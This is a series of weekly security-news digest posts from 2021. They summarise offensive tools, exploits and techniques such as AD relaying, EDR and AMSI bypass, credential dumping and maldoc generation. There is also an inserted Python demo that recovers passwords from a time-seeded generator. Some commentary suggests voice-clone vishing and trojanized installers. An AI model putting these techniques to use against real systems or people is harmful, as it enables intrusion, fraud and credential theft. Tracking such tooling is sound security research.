New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

  • malwarescarecrow is a tool designed to make physical devices detectable by malware and make the system look like a virtual machine.
  • Real-Time-Voice-Cloning. The vishing (voice phishing) implications of this are scary. Imagine calling a supervisor to get audio samples, then using those to train the model and create a script to demand action on a phishing email from an employee. Demo here.

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing. This post is cross-posted on SIXGEN's blog.

Last Week in Security (LWiS) - 2021-06-28

By: Erik
29 June 2021 at 02:45

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2021-06-21 to 2021-06-28.

News

Techniques

Tools and Exploits

  • Ghidra 10.0. The first major version bump since Ghidra went public; it is backwards compatible with projects created in 9.x (but projects created in 10.x cannot be opened by 9.x). This is also the first public release of the debugger! Check out What's New.
  • SharpMailBOF is a BOF.NET program to split a file into smaller chunks and email it via a specified SMTP relay. Useful for getting large files (lsass dumps?) on slow networks using a different exfiltration method.
  • compressedCredBandit is a modification to CredBandit that compresses the data (using MSZIP) before sending it back which should reduce the noise on the wire.
  • AttackSurfaceAnalyzer is a tool from Microsoft to help you analyze your operating system's security configuration for changes during software installation. Run it on a base install, then install all the programs your target has, re-run it, profit?
  • raccoon is a Salesforce object access auditor. For more information, check the blog post.
  • CVE-2021-27850_POC is a PoC for a critical unauthenticated remote code execution vulnerability found in all recent versions of Apache Tapestry. By downloading the AppModule.class file you can leak the HMAC secret key used to sign all the serialized objects in Apache Tapestry, and with it sign a serialized object of your own.
  • CVE-2021-31955-POC. While perhaps not useful on its own, if you have another vulnerability and are waiting on a kernel information disclosure for Windows, this is a nice PoC.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

  • Legal Considerations when Gathering Online Cyber Threat Intelligence and Purchasing Data from Illicit Sources. This could be of interest if you deal in data breaches or other threat intelligence.
  • jimi is an automation first no-code platform designed and developed originally for Security Orchestration and Response. Since its launch jimi has developed into a fully fledged IT automation platform which effortlessly integrates with your existing tools unlocking the potential for autonomous IT and Security operations.
  • useful-forks aims at increasing the discoverability of useful forks of open-source projects. GitHub's fork view is nearly worthless for determining whether a fork added anything to the code or not.
  • WindowsBinaryReplacements is a nice collection of small Windows utilities in C#. These would make great "built in" commands for a custom C# rat.

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing. This post is cross-posted on SIXGEN's blog.

Last Week in Security (LWiS) - 2021-07-06

By: Erik
7 July 2021 at 02:45

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2021-06-28 to 2021-07-06.

News

Techniques

  • Kaspersky Password Manager: All your passwords are belong to us. The generator was seeded with nothing but the current time in seconds, so every instance of Kaspersky Password Manager in the world generates the exact same password in a given second; silly UX kept this from being caught earlier. Or (dons tinfoil hat) maybe something else did...
  • Taking over Uber accounts through voicemail. This is an attack enabled by the fact Uber will deliver OTP codes via audio to voicemail, and the fact that voicemail boxes are usually very easy to compromise. Ensure your scoping document allows for this type of attack before attempting, as multiple parties are involved.
  • A Red Team Operation Leveraging a zero-day vulnerability in Zoom. Unpacking and adding payloads to legitimate installers is a nifty trick. Without complete verification of all files in an MSI this is possible, and the best part is these applications are likely allow-listed by AV/EDR or the SOC.
  • An EPYC escape: Case-study of a KVM breakout. This post describes a vulnerability in KVM's AMD-specific code and discusses how this bug can be turned into a full virtual machine escape. This is the first public writeup of a KVM guest-to-host breakout that does not rely on bugs in user space components such as QEMU.
  • GateKeeper - Not a Bypass (Again). macOS' Gatekeeper alerts users when executing files that have been downloaded, but it doesn't alert on notarized dynamic library loads, even if they have the quarantine attribute set. How can this be abused? Malicious screen savers, color picker plugins, preference panes etc can be used to execute arbitrary code from the internet without any warnings. Getting the files to the correct locations is an exercise left to the reader.
  • BITS Persistence for Script Kiddies. This technique is likely monitored by EDR but is worth having in your tool bag none the less.
  • gcp-dhcp-takeover-code-exec. By predicting the seed to the random number generator used by Debian's DHCP client, a malicious user with access to a VM in the same subnet of a rebooting VM can impersonate the metadata service and add a malicious ssh key to the victim VM. The practical implications of this are very limited, but it remains unpatched.
  • Hunting for Windows “Features” with Frida: DLL Sideloading. DLL sideloading is an underutilized technique, but as it is hard to detect, advanced adversaries are using it. The new WFH tool uses Frida to identify potentially sideload-able DLLs in programs.
  • Abusing Resource-Based Constrained Delegation (RBCD) using Linux. RBCD is a confusing misconfiguration present in some Active Directory environments. This post has both an offensive and defensive walkthrough.
  • Merging C# Assemblies using dnMerge. This new C# assembly merge tool is a plugin for MSBuild that plays nicely with dotnet and uses LZMA for more efficient compression than Costura, allowing more tools to stay under the 1MB limit of Cobalt Strike's execute-assembly command.
  • Exploiting the Sudo Baron Samedit vulnerability (CVE-2021-3156) on VMWare vCenter Server 7.0. This in depth post digs into how the Sudo LPE works, what vCenter/Photon OS is, and how they adapted the exploit to work against vCenter 7.
  • Exploit mitigations: keeping up with evolving and complex software/hardware. This projects aims to answer the question, "does my current environment have mitigation X?"
  • How to exploit a vulnerable windows driver. AsRock took RWEverything, slapped some AES encryption (with hardcoded key) on the ioctl calls, and shipped it as a product. A quick overwrite of BeepDeviceControl and you have kernel execution.
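The Kaspersky Password Manager item above comes down to one design error: a generator whose only entropy is the wall clock. The following is an added example, not Kaspersky's code or the researchers' tooling, modelling that error with Python's own Mersenne Twister. The alphabet, password length and the generation method are assumptions for the demo; the point it shows is that two "instances" asked in the same second agree, and that anyone who knows roughly when a password was created can recover it by brute forcing seconds rather than characters.

```python
import math
import random
import string

# Simplified model (not KPM's code): a Mersenne Twister seeded with nothing but
# the wall clock in whole seconds, then used to draw password characters.
ALPHABET = string.ascii_letters + string.digits + "!@#$%^&*"


def generate(seed_seconds: int, length: int = 12) -> str:
    """What every instance produces when asked for a password in that second."""
    rng = random.Random(seed_seconds)
    return "".join(rng.choice(ALPHABET) for _ in range(length))


def recover_seed(password: str, window_start: int, window_end: int):
    """Brute force the creation second given a known password and a time window.

    An attacker who knows an account's creation date only has to try the
    seconds in that window, not the full character space.
    """
    length = len(password)
    for t in range(window_start, window_end + 1):
        if generate(t, length) == password:
            return t
    return None


def effective_entropy_bits(window_seconds: int, length: int) -> tuple:
    """Nominal vs. actual keyspace: the seed, not the alphabet, bounds the search."""
    nominal = length * math.log2(len(ALPHABET))
    actual = math.log2(window_seconds)
    return nominal, actual


if __name__ == "__main__":
    t = 1625000000  # constructed creation time (Unix seconds)
    pw = generate(t)
    print("instance A:", pw)
    print("instance B:", generate(t))
    print("recovered seed:", recover_seed(pw, t - 3600, t + 3600))
    print("nominal/actual bits over one year:", effective_entropy_bits(365 * 86400, 12))
```

Over a whole year there are only about 31.5 million seconds, under 2^25 candidates, regardless of how long or how "complex" the generated password looks. That is why the time of account creation (often visible in a breach dump) is enough to recover such a password offline.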

Tools and Exploits

  • PrintNightmare. The print spooler in Windows has a vulnerability that allows any authenticated domain user to install a print driver and achieve remote code execution as SYSTEM on any host running the spooler, domain controllers included.
  • ManuFuzzer is an LLVM-based binary, coverage-guided fuzzing framework for macOS. It is simple to integrate coverage-guided fuzzing with ManuFuzzer: just define a special function, update some build flags, and you have instant binary-only, coverage-guided fuzzing (only basic-block coverage). Using ManuFuzzer, you can instrument one or more selected frameworks for coverage and fuzz the target functions/library.
  • Injector is a complete arsenal of memory injection and other techniques for red-teaming in Windows written in C#. This is a good base for writing your own loader, or testing EDR detections in a purple team scenario.
  • pstf2 is an implementation of an HTTP server capable of passive browser fingerprinting to detect and block security scanning services from accessing hosted payloads.
  • RelayRumbler is a proof-of-concept tool that attempts to retrieve the configuration from the memory dump of an F-Secure C3 Relay executable.
  • PageTableInjection is a proof-of-concept of the page table injection technique to inject malicious code into the arbitrary user processes. Be sure to read "The Problem" section to understand stability issues.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

  • shutter. Not sure how I missed this gem. The goal of Shutter is to manage Windows network stack communication via the Windows Filtering Platform. Management can include blocking or permitting traffic based on IP or on the executable that initiates or receives the traffic. This is useful to blackhole event logging or defensive agent communication, or to explicitly permit specific executables to communicate if they have been previously restricted by policy, and it runs totally in memory. How good is that expensive EDR if it can't call home?
  • agentstub. SSH agent forwarding is a big win for attackers with root on a compromised machine, and this tool illustrates some private key operations that can be done through the forwarded ssh-agent, like signing files with RSA private keys.
  • Vanara is set of .NET libraries for Windows implementing P/Invoke calls to many native Windows APIs with supporting wrappers. Use this to easily add P/Invoke calls to your next C# tool.
  • PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic destined for one TCP port (e.g., 445/TCP) to another TCP port (e.g., 8445/TCP). PortBender includes an aggressor script that operators can leverage to integrate the tool with Cobalt Strike. However, because the tool is implemented as a reflective DLL, it can integrate with any C2 framework supporting loading modules through a "ReflectiveLoader" interface. Be aware this loads a driver, WinDivert64.sys.

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing. This post is cross-posted on SIXGEN's blog.

Last Week in Security (LWiS) - 2021-07-12

By: Erik
13 July 2021 at 03:59

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2021-07-06 to 2021-07-12.

News

  • Multiple U.S. States Sue Google for Violating Antitrust Laws With Play Store Fees. Last year Google said that all app developers would be required to use the Google Play Store payment system for in-app billing, which comes with a 30% cut to Google. What this means for Apple, who had a trial in May against Epic Games over the same issue (decision pending), remains to be seen.
  • New privacy policy is completely unacceptable!. Audacity was bought by Muse Group (which owns Ultimate Guitar and MuseScore as well) and predictably want telemetry on the user base of their new toy or their lawyers slapped the boilerplate on it to cover all eventualities. Either way, there is now tenacity.
  • Biden Sets Up Tech Showdown With ‘Right-to-Repair’ Rules for FTC. This battle has been brewing for a while as companies push harder against consumers actually owning, well, anything really. With pressure from the top, perhaps a set of FTC rules could give power back to the people and ensure that you do actually own what you buy and are free to modify and repair it on your own.
  • DIVD-2021-00011 - Kaseya VSA Limited Disclosure. The Dutch Institute for Vulnerability Disclosure (DIVD) found and warned Kaseya about multiple vulnerabilities in April. Was the REvil exploit a case of parallel discovery, or perhaps a compromise of the Kaseya ticketing system?
  • Microsoft Bug Bounty Programs Year in Review: $13.6M in Rewards. While that is a big number, the bug bounty community, and Microsoft specifically, have been at the center of some bug bounty drama. Hopefully it encourages more researchers to responsibly report vulnerabilities, and other companies to enact their own bug bounty programs.

Techniques

Tools and Exploits

  • TokenTactics is an Azure JSON Web Token (JWT) manipulation toolset. Based on the work at AAD Internals, it adds the ability to pivot between token types, requiring (in certain setups) only one device code phish for wide access into Azure, Teams, Outlook, etc. The target inputs a code into a legitimate Microsoft page, but the codes are only good for 15 minutes.
  • InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strike's traditional fork and run execute-assembly module. InlineExecute-Assembly will execute any assembly with the entry point of Main(string[] args) or Main(). This should allow you to run most released tooling without any prior modification needed. More information in the blog post.
  • TeamsUserEnum will determine whether an email is registered on Teams or not. More details on immunIT's blog.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

  • rustpad is an efficient and minimal collaborative code editor, self-hosted, no database required. Consider this where you would have used Etherpad in the past.
  • reconmap. This looks like a great tool to help operators collaborate on an external penetration test or red team engagement.

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing. This post is cross-posted on SIXGEN's blog.

Last Week in Security (LWiS) - 2021-07-19

By: Erik
20 July 2021 at 03:59

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2021-07-12 to 2021-07-19.

News

Techniques

Tools and Exploits

  • CVE-2021-3492 is an exploit for a bug in the shiftfs driver in Ubuntu that was introduced in April 2019, affecting at least 20.04 and 20.10. It was used successfully at Pwn2Own, with the full details released this week in a blog post.
  • SharpImpersonation is a token impersonation tool written in C#. Lots of details in this blog post.
  • SharpExcelibur is a tool to read Excel spreadsheets (XLS/XLSX) using Cobalt Strike's execute-assembly functionality.
  • injectAmsiBypass is a Cobalt Strike Beacon Object File (BOF) that bypasses AMSI in a remote process with code injection.
  • PetitPotam is a PoC tool to coerce Windows hosts to authenticate to other machines via the MS-EFSRPC EfsRpcOpenFileRaw function. Disabling the EFS service does not appear to mitigate the "feature".
  • CheeseSQL provides command execution and lateral movement via MSSQL trusts. This tool has been developed to overcome some of the limitations of already existing tools like ESC, mostly regarding MSSQL impersonation. Moreover, CheeseSQL has been specifically modified to run from Covenant (via reflective loading), and to automate the most important phases of MSSQL trust abuse.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

  • CVE-2020-1020-Exploit is a Type 1 font pool overflow LPE exploit. Supported OS: Windows 7, 8, 8.1 x64.
  • kerlab is a Rust implementation of Kerberos for fun and detection. It implements a few Kerberos features from Rubeus as well as credential spraying and offline brute forcing.

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing. This post is cross-posted on SIXGEN's blog.

Last Week in Security (LWiS) - 2021-07-26

By: Erik
27 July 2021 at 03:59

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2021-07-19 to 2021-07-26.

News

  • Updates Regarding VSA Security Incident. Kaseya got their hands on a universal decryptor for the ransomware that hit thousands of their customers on the Friday before the July 4th holiday in the US. They state, "in no uncertain terms that Kaseya did not pay a ransom – either directly or indirectly through a third party – to obtain the decryptor." This leaves two possibilities: someone found a flaw in the encryption scheme a professional ransomware crew with years of experience was using, or someone acquired the universal decryptor key without paying for it (leak, hack, deal to not get arrested by the FSB, etc). If there was a flaw in the encryption, have researchers been sitting on it like the allies allowed ships to be sunk after breaking the Enigma cipher in WWII? Was the Kaseya incident big enough to "burn" the technique? With the disappearance of REvil's public infrastructure, I suspect the FSB came knocking, demanded the key, and told them to take a nice vacation on the Black Sea while things cool off.
  • OpenVPN Security Improvements and Changes. Two Ukrainian Windscribe VPN servers were seized and since they were unencrypted and had persistent disks, the authorities got hold of the OpenVPN private keys. In the age of ubiquitous HTTPS and HSTS preloading VPNs are effective against a very specific threat model, and are probably unnecessary for most people (despite what the YouTube ads will tell you).
  • CVE-2021-36934 aka HiveNightmare aka SeriousSAM. For some reason, Windows 10 starting with 1809 and Server 2019 modified the access control lists on the SAM, SYSTEM and SECURITY hives to allow regular users to read their contents. While the files are locked normally, if the system has volume shadow copies (VSS), the hives can be read from there and the hashes extracted offline. Check out CVE-2021-36934 to check for shadow copies and read them all in memory, and this Velociraptor query to hunt for it.

Techniques

Tools and Exploits

  • Beaconator is an aggressor script for Cobalt Strike used to generate a raw stageless shellcode and packing the generated shellcode using PEzor.
  • smartbrute is a smart password spraying and bruteforcing tool for Active Directory Domain Services. It supports NTLM over SMB or LDAP as well as Kerberos pre-authentication bruteforcing. It can also bruteforce a domain intelligently to avoid locking out users.
  • inno-shellcode-example is an InnoSetup template that runs shellcode! How easy is it to convince a user they need to install Zoom, Adobe Reader XYZ, or whatever-app to join your meeting, read your document, etc? Now you can have a legit installer with some extra shellcode injection!
  • Medusa is a cross-platform C2 agent compatible with Python 2.7 and 3.8, compatible with Mythic. This new agent has some nice features, but does require Python (just a base install) on the target to run.
  • LittleCorporal is a C# automated maldoc generator. It uses a two step process to first self-inject into Word via an AutoOpen macro, and then inject the real payload from word into a running process. The use of InlineShape and automated building is just the cherry on top.
  • ppmap is a scanner/exploitation tool written in Go, which leverages Prototype Pollution to XSS by exploiting known gadgets. Use this on your next web app assessment or bug bounty.
  • dock-droid is dockerized android. Run QEMU Android x86 and Android ARM in a Docker with X11 Forwarding. This could be useful for CI/CD for Android or for poking at Android apps "live."
  • BadAssMacros is an automated malicious macro generator written in C# with capabilities like VBA purging, sandbox detections, and shellcode obfuscation.
  • RemotePotato0 Cross Session Activation. Version 1.1 drops the requirement for the victim to be in session 0. Now you can coerce and relay NTLM authentication from any user in any session!
  • Detect-Hooks is a proof of concept Beacon Object File (BOF) that attempts to detect userland API hooks in place by AV/EDR. The BOF will return a list of detected API hooks or let the operator know no hooks were detected. This can be useful knowledge to have before performing certain post-exploitation actions.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

  • git-split-diffs brings GitHub style split diffs to your terminal.
  • dorothy is a tool to test security monitoring and detection for Okta environments.

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing. This post is cross-posted on SIXGEN's blog.

Last Week in Security (LWiS) - 2021-08-02

By: Erik
3 August 2021 at 03:59

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2021-07-26 to 2021-08-02.

News

  • Welcome to Bug Hunter University. Google launches their own educational content aimed at bug hunters that are working on Google products. Don't expect technique walkthroughs, this is more of a detailed guide on how to bug hunt against Google (i.e. what is in scope, what is considered auth bypass, etc).
  • CISA Announces New Vulnerability Disclosure Policy (VDP) Platform. The US federal government is getting into the bug bounty game with the help of BugCrowd. The Department of Homeland Security (DHS), the Department of Labor (DoL), and the Department of Interior (DoI) are among the agencies planning to leverage this platform at the onset.
  • Amazon hit by record $887 million EU privacy fine. The EU says Amazon processed personal data in ways that violated GDPR requirements; Amazon said the decision was "without merit." Looks like the real winners in this case will be the lawyers.
  • MDSec pushes Nighthawk C2 framework PR via Twitter. The upcoming commercial C2 from MDSec looks like it has some pretty interesting features: hot swappable C2 profiles, in memory encryption for evasion, BOF compatibility, etc. "Coming soon."
  • Introducing BloodHound Enterprise: Attack Path Management for Everyone. The enterprise version of the extremely popular BloodHound tool is out now! If you have a massive AD environment, it is likely worth the cost to get what amounts to a top tier AD penetration test with helpful interactive remediation and retesting.
  • PortSwigger launches Burp Suite Certified Practitioner. All the training material and even a practice exam are available for free, and the cost is very reasonable at $99. The certification expires after five years with no word on whether you have to pay to "maintain" it beyond that time.

Techniques

  • NTLM relaying to AD CS - On certificates, printers and a little hippo. The AD GOAT is back to lay it down on NTLM relaying, and even add a little bit of his own twist with PKINITtools. If you only read one post about the latest AD CS relaying and PetitPotam, read this one. Want to use Cobalt Strike for this? Read NTLM Relaying via Cobalt Strike.
  • Developing an exploit for the Jira Data Center Ehcache RCE (CVE-2020-36239). I love this kind of post. It walks through every step from reading a bug advisory to RCE and all the struggles, blog posts, and different attempts along the way.
  • From Stolen Laptop to Inside the Company Network. Think your BitLocker encrypted laptop is safe from a determined adversary? Think again. The trusted platform module (TPM) sends the BitLocker encryption key via Serial Peripheral Interface (SPI) in plaintext. A bit of research and a quick hookup with a Saleae logic analyzer spill the beans. The SSD was then extracted and decrypted. Because the target had a "pre-logon" VPN tunnel set up, the assessors were able to build a test VM and connect to internal file shares. Very nice work against a hardened laptop. Enable that pre-boot authentication!
  • Stealing Tokens In Kernel Mode With A Malicious Driver. This post walks through building a simple driver to copy access tokens between PIDs to allow user spoofing or privilege escalation. Bypassing driver signing is another topic altogether, but the basics of kernel development and userspace to kernel communication are covered here nicely.
  • Root Cause Analysis of a Printer’s Drivers Vulnerability CVE-2021-3438. Last week's SSPORT.sys printer driver vulnerability may have been oversold! VoidSec breaks down the root cause and describes why it can be, at best, a denial of service exploit.
  • WebContent->EL1 LPE: OOBR in AppleCLCD / IOMobileFrameBuffer. If nothing else, this is good proof of "parallel discovery" even against a "hard target" like iOS. The POC is available, but without the arbitrary read/write needed to finish it.
  • Fuzzing Windows RPC with RpcView introduces the process to enumerate RPC servers with RpcView. Expect some good stuff from itm4n as a result of this.
  • The path to code execution in the era of EDR, Next-Gen AVs, and AMSI introduces inceptor, a template-based PE packer for Windows, designed to help penetration testers and red teamers to bypass common AV and EDR solutions. Inceptor has been designed with a focus on usability, and to allow extensive user customization. Inceptor is a framework that wraps many other useful tools, sgn, sRDI, donut, DInvoke, Syswhispers, ConfuserEx, Chameleon, LLVM-Obfuscator, and others to create an easy to use tool chain to wrap, compile, and obfuscate input shellcode or PE files. This could be a very useful base to extend with private templates and incorporate into your own workflow.
  • Universal Privilege Escalation and Persistence – Printer. The PrintNightmare saga may have cooled off, but this post explores how to set up your own rogue printer for that double-click to system privilege escalation.

Tools and Exploits

  • byeintegrity8-uac is a Windows 7 to Windows 11 compatible "Always Notify" UAC bypass. It's also been implemented in UACME as technique #69.
  • Issue 2186: Exchange: AD Schema Misconfiguration Elevation of Privilege. Installing Exchange in an AD environment modified the AD schema in a way that allowed computer accounts to create arbitrary AD objects as children (users, etc). This was patched in the Exchange cumulative updates released on 2021-06-29 but is worth checking for on your next assessment.
  • Introducing Mimikatz Kit. HelpSystems has decoupled Mimikatz from CobaltStrike releases with Mimikatz Kit. With the rapid rate of new features in Mimikatz recently this is a welcome change.
  • raider is a framework designed to test authentication for web applications. While web proxies like ZAProxy and Burpsuite allow authenticated tests, they don't provide features to test the authentication process itself, i.e. manipulating the relevant input fields to identify broken authentication. Most authentication bugs in the wild have been found by manually testing it or writing custom scripts that replicate the behaviour. Raider aims to make testing easier, by providing the interface to interact with all important elements found in modern authentication systems. It uses a Lisp like configuration language to control the authentication flows.
  • ADCSPwn is a tool to escalate privileges in an Active Directory network by coercing authentication from machine accounts (PetitPotam) and relaying it to the certificate service. This is your easy button for PetitPotam + ESC8 exploitation.
  • NinjaC2 V2.1 : New webshell agent, more features and updated AV bypass. The update adds a webshell and a few other AV bypass features.
  • Linux_LPE_eBPF_CVE-2021-3490 is an LPE exploit for CVE-2021-3490. Tested on Ubuntu 20.10 (Groovy Gorilla) kernels 5.8.0-25.26 through 5.8.0-52.58 and Ubuntu 21.04 (Hirsute Hippo) 5.11.0-16.17. Full details in Kernel Pwning with eBPF: a Love Story.
  • pywhisker is a Python equivalent of the original Whisker made by Elad Shamir and written in C#. This tool allows users to manipulate the msDS-KeyCredentialLink attribute of a target user/computer to obtain full control over that object. It's based on Impacket and on our Python equivalent of Michael Grafnetter's DSInternals called PyDSInternals. This tool, along with Dirk-jan's PKINITtools, allows the full exploitation chain to be run from UNIX-based systems.
  • targetedKerberoast is a Python script that can, like many others (e.g. GetUserSPNs.py), print "kerberoast" hashes for user accounts that have a SPN set. This tool brings the following additional feature: for each user without SPNs, it tries to set one (abusing a write permission on the servicePrincipalName attribute), prints the "kerberoast" hash, and deletes the temporary SPN set for that operation. This is called targeted Kerberoasting. This tool can be used against all users of a domain, a list of users, or a single user supplied on the CLI.
  • scarecrow_wrapper is a wrapper payload for Mythic that wraps any agent shellcode with the ScareCrow loader. This wrapper currently supports CPL, EXE, and DLL payload types from ScareCrow.
  • MicrosoftWontFixList. Are you lost in all the "Won't fix" vulnerabilities released or discovered in July? This page has them all summarized for you.
  • spawn is a Cobalt Strike BOF that spawns a sacrificial process, injects it with shellcode, and executes the payload. Built to evade EDR/userland hooks by spawning the sacrificial process with Arbitrary Code Guard (ACG), BlockDll, and PPID spoofing.
  • hallucinate is a one-stop tool for TLS traffic inspection and manipulation using dynamic instrumentation. For more information check out the introductory blog post.
  • ligolo-ng is an advanced, yet simple, tunneling/pivoting tool that uses a TUN interface. Instead of using a SOCKS proxy or TCP/UDP forwarders, Ligolo-ng creates a userland network stack using Gvisor.
  • revealin is a tool to uncover the full name of a target on Linkedin by taking advantage of the autocomplete feature.

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing. This post is cross-posted on SIXGEN's blog.

Last Week in Security (LWiS) - 2021-08-09

By: Erik
10 August 2021 at 03:59

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2021-08-02 to 2021-08-09.

News

Techniques

Tools and Exploits

  • DeployPrinterNightmare is a C# tool for installing a shared network printer abusing the PrinterNightmare bug to allow other network machines easy privesc!
  • whoc is a container image that extracts the underlying container runtime and sends it to a remote server. Poke at the underlying container runtime of your favorite CSP container platform!
  • Certify is a C# tool to enumerate and abuse misconfigurations in Active Directory Certificate Services (AD CS). This is the toolset promised with the release of Certified Pre-Owned: Abusing Active Directory Certificate Services in June of 2021. A recent post covered the attacks in more practical terms.
  • EyeWitnessTheFitness is a combination of EyeWitness (web screenshot OSINT tool) and fireprox (IP rotation proxy via AWS API gateway) that only uses one fireprox API for all EyeWitness targets.
  • SigFlip is a tool for patching authenticode signed PE files (exe, dll, sys, etc) without invalidating or breaking the existing signature. This looks particularly nasty and is used by APT 10.
  • SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion. This tool was released alongside the talk Operation Bypass Catch My Payload If You Can.
  • BeaconEye scans running processes for active CobaltStrike beacons. When processes are found to be running beacon, BeaconEye will monitor each process for C2 activity. Check out IsBeaconProcess to make sure your beacon wouldn't get picked up.
  • concealed_position is a local privilege escalation attack against Windows using the concept of "Bring Your Own Vulnerability". Specifically, Concealed Position (CP) uses the as-designed Package Point and Print logic in Windows that allows a low privilege user to stage and install printer drivers. CP specifically installs drivers with known vulnerabilities which are then exploited to escalate to SYSTEM. Concealed Position was first presented at DEF CON 29.
  • haklistgen is a tool that turns any junk text into a usable wordlist for brute-forcing (subdomains, words in HTTP response, etc).

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

  • RegExp is a replacement for the Windows built-in Regedit.exe tool. Improvements over that tool include many enhanced features.
  • reverse-ssh is a statically linked SSH server with a reverse connection feature for simple yet powerful remote access.
  • dnsmonster is a passive DNS collection and monitoring tool built with Golang, ClickHouse and Grafana. This is a scalable solution for enterprise DNS monitoring.

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing. This post is cross-posted on SIXGEN's blog.

Last Week in Security (LWiS) - 2021-08-16

By: Erik
17 August 2021 at 03:59

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2021-08-09 to 2021-08-16.

News

Techniques

Tools and Exploits

  • CobaltStrikeReflectiveLoader is perhaps the first public User-Defined Reflective Loader for Cobalt Strike 4.4. If you are writing your own, be ready to write a lot of assembly...
  • ProxyShell is the Exchange Server RCE (ACL Bypass + EoP + Arbitrary File Write) patched in April and May of 2021 (but not published in an advisory until July 2021). Also check out proxyshell-poc. See here for the technique break down: My Steps of Reproducing ProxyShell.
  • MiniDump is a C# implementation of mimikatz/pypykatz minidump functionality to get credentials from LSASS dumps.
  • LazySign creates fake certs for binaries using windows binaries and the power of bat files. If you're on Linux try Limelighter.
  • CobaltSpam is a tool based on CobaltStrikeParser from SentinelOne which can be used to spam a CobaltStrike server with fake beacons.
  • COM-Hijacking is an example of COM hijacking using a proxy DLL.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

  • raivo-otp / ios-application. A native, lightweight and secure one-time-password (OTP) client built for iOS; Raivo OTP! Why switch from my current OTP app? See here.
  • reko is a decompiler for machine code binaries. If Ghidra or radare2/Rizin aren't your thing, give reko a shot.
  • SysmonTools contains the following: Sysmon View: an off-line Sysmon log visualization tool, Sysmon Shell: a Sysmon configuration utility, and Sysmon Box: a Sysmon and Network capture logging utility.
  • RmiTaste allows security professionals to detect, enumerate, interact and exploit RMI services by calling remote methods with gadgets from ysoserial.
  • REW-sploit can get a shellcode/DLL/EXE, emulate the execution, and give you a set of information to help you in understanding what is going on. Example of extracted information are: API calls, encryption keys used by MSF payloads, decrypted 2nd stage coming from MSF, and Cobalt-Strike configurations (if CobaltStrikeParser is installed).

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing. This post is cross-posted on SIXGEN's blog.

Last Week in Security (LWiS) - 2021-08-23

By: Erik
24 August 2021 at 03:59

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2021-08-16 to 2021-08-23.

News

Techniques

Tools and Exploits

  • Added EfsRpc method (aka PetitPotam). SweetPotato gets a PetitPotam upgrade, so if you have SeImpersonatePrivilege on a fully patched Windows 10 machine, you can get SYSTEM.
  • ServiceMove-BOF is a new lateral movement technique that abuses the Windows Perception Simulation Service to achieve DLL hijacking code execution. Note that it works on Windows 10 1809 or above only.
  • BOF-ForeignLsass dumps lsass memory by opening a handle to a process that already has a handle open to lsass, with the hope of looking less suspicious by stealing this "legitimate" handle.
  • kubescape is the first tool for testing if Kubernetes is deployed securely as defined in the Kubernetes Hardening Guidance by the NSA and CISA.

New to Me

This section is for news, techniques, and tools that weren't released last week but are new to me. Perhaps you missed them too!

Techniques, tools, and exploits linked in this post are not reviewed for quality or safety. Do your own research and testing. This post is cross-posted on SIXGEN's blog.

Last Week in Security (LWiS) - 2021-09-07

By: Erik
8 September 2021 at 03:59

Last Week in Security is a summary of the interesting cybersecurity news, techniques, tools and exploits from the previous week. This post covers 2021-08-23 to 2021-09-07.

News

Techniques

  • Operational Mental Models. After releasing the EDR Sensor Evasion Flowchart, @Jackson_T is back with another meta-assessment post about the frameworks and models for offensive research and development.
  • ZDI-21-1053: Bypassing Windows Lock Screen. The ease of access on screen reader is used once again to execute binaries on a USB and execute code even with the screen of a Windows 10 computer locked. PoC video here.
  • From RpcView to PetitPotam. In this post, we will see how the information provided by this tool can be used to create a basic RPC client application in C/C++. Then, we will see how we can reproduce the trick used in the PetitPotam tool.
  • Introducing Process Hiving & RunPE. "This blog introduces innovative techniques and is a must have tool for the red team arsenal. RunPE is a .NET assembly that uses a technique called Process Hiving to manually load an unmanaged executable into memory along with all its dependencies, run that executable with arguments passed at runtime, including capturing any output, before cleaning up and restoring memory to hide any trace that it was run." A solid PE runner is a must-have in every red team toolkit. Code here.
  • %appdata% is a mistake – Introducing Invoke-DLLClone. DLL hijacking isn't new but darn if it isn't effective still. The new Invoke-DLLClone is worth a look!
  • Obsidian, Taming a Collective Consciousness. Red team knowledge management is a topic I am all too familiar with (imagine the data that powers this blog...). This post shows a "flat" markdown note based approach that uses Obsidian.
